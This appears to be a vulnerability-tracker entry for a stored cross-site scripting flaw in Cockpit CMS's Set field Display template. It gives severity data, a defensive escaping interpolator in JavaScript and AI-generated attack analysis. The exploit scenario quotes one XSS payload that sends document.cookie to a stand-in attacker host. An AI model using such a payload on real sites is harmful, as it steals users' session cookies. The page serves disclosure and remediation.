
Cockpit CMS CVE-2026-23695

EUVD-2026-30556 · MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-15 · VulnCheck · GHSA-ch4j-vcf5-58x5
CVSS 4.0 (NVD): 5.1

Severity by source

NVD (primary): 5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD; NVD is the only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Privileges Required: Low (PR:L)
User Interaction: Passive (UI:P)
Scope: X (not defined)

Lifecycle Timeline (3 events)

Source Code Evidence Fetched: May 15, 2026, 17:33 (vuln.today)
Analysis Generated: May 15, 2026, 17:33 (vuln.today)
CVSS changed: May 15, 2026, 17:22 (NVD): 5.4 (MEDIUM) -> 5.1 (MEDIUM)

Description (CVE.org)

Cockpit CMS through version 2.14.0 (patched in commit 72a83fc) contains a stored cross-site scripting vulnerability in the Set field type's Display template option: the template string is compiled by the $interpolate function using new Function() and rendered via Vue's v-html directive without sanitization. An attacker with content/:models/manage permission can inject arbitrary JavaScript into the Display template, which executes in the browser of any user viewing the collection items list.
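The description above names two unsafe steps: the editor-supplied template is compiled with new Function(), and the result is injected with v-html. What follows is an added example, not Cockpit's code and not the change made in commit 72a83fc, of a display-template interpolator that does neither. Placeholders are resolved by plain string substitution, nothing is evaluated, and both the template's literal text and the substituted field values are HTML-escaped, so markup typed by a content editor is displayed literally instead of rendered. The ${field} placeholder syntax, the function names and the sample item are assumptions made for this example.

```javascript
// Added example, not code from Cockpit CMS: a display-template interpolator
// that never evaluates the template as code and HTML-escapes all output.
// The "${field}" placeholder syntax is an assumption made for this example.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape the characters that can switch HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// A placeholder is a bare identifier only. Property access, calls or
// arithmetic inside ${...} do not match and stay literal text, which is the
// point: there is no expression evaluator to reach.
const PLACEHOLDER = /\$\{\s*([A-Za-z_][A-Za-z0-9_]*)\s*\}/g;

// Resolve a field on the item itself; inherited properties such as
// "constructor" are not content fields and resolve to an empty string.
function lookupField(item, name) {
  return Object.prototype.hasOwnProperty.call(item, name) ? item[name] : '';
}

// Build the display string. Literal template text and substituted values are
// both escaped, so the result is inert even if it reaches v-html/innerHTML.
function interpolateDisplay(template, item) {
  const src = String(template);
  let out = '';
  let last = 0;
  for (const m of src.matchAll(PLACEHOLDER)) {
    out += escapeHtml(src.slice(last, m.index));
    out += escapeHtml(lookupField(item, m[1]));
    last = m.index + m[0].length;
  }
  out += escapeHtml(src.slice(last));
  return out;
}

// Constructed sample: a collection item and an editor-supplied template that
// contains markup and an expression. The markup is displayed, not rendered,
// and the expression is left as text.
const sampleItem = { title: '<i>Launch</i> plan', status: 'draft' };
const sampleTemplate = '<b>${title}</b> (${status}) ${status.length}';

console.log(interpolateDisplay(sampleTemplate, sampleItem));
// -> &lt;b&gt;&lt;i&gt;Launch&lt;/i&gt; plan&lt;/b&gt; (draft) ${status.length}
```

Because the output is already escaped, binding it through v-html (or innerHTML) shows tags as text; binding it through ordinary text interpolation is equivalent and the simpler choice. If the product needs editor-authored markup in display templates, the escaping has to be replaced by an allow-list HTML sanitizer applied to the final string, never skipped, since the content/:models/manage role named above is not an administrator role.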

Analysis (AI-generated)

Stored cross-site scripting in Cockpit CMS 2.14.0 and earlier allows authenticated users with content/:models/manage permission to inject arbitrary JavaScript through the Set field type's Display template option. The vulnerability stems from unsafe template rendering: the template is compiled with new Function() and rendered through Vue's v-html directive without sanitization, so injected code executes in the browser of every user viewing the collection items list. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Authenticate with content editor privileges
Delivery: Access collection field settings
Exploit: Inject malicious JavaScript in Set field Display template
Install: Save configuration
C2: Victim user views collection items list
Execute: Browser executes stored XSS payload
Impact: Exfiltrate session tokens or perform actions as victim

Vulnerability Assessment (AI-generated)

Exploitation: Requires authenticated access with content/:models/manage permission, which is typically granted to content editors and administrators in Cockpit CMS but not to anonymous or read-only users. …
Risk Assessment: Moderate real-world risk despite the low CVSS score of 5.1. …
Exploit Scenario: A content editor with content/:models/manage permission logs into Cockpit CMS and navigates to a collection's field configuration. They edit a Set field type's Display template option and inject malicious JavaScript such as <img src=x onerror='fetch("https://attacker.com?c="+document.cookie)'> wrapped in template syntax that bypasses basic validation. …
Remediation: Upgrade to a Cockpit CMS version later than 2.14.0 that incorporates commit 72a83fc or a later commit from the main branch (https://github.com/Cockpit-HQ/Cockpit/commit/72a83fcfe85ad8330e9ae834bc02fa517b5749e9). …
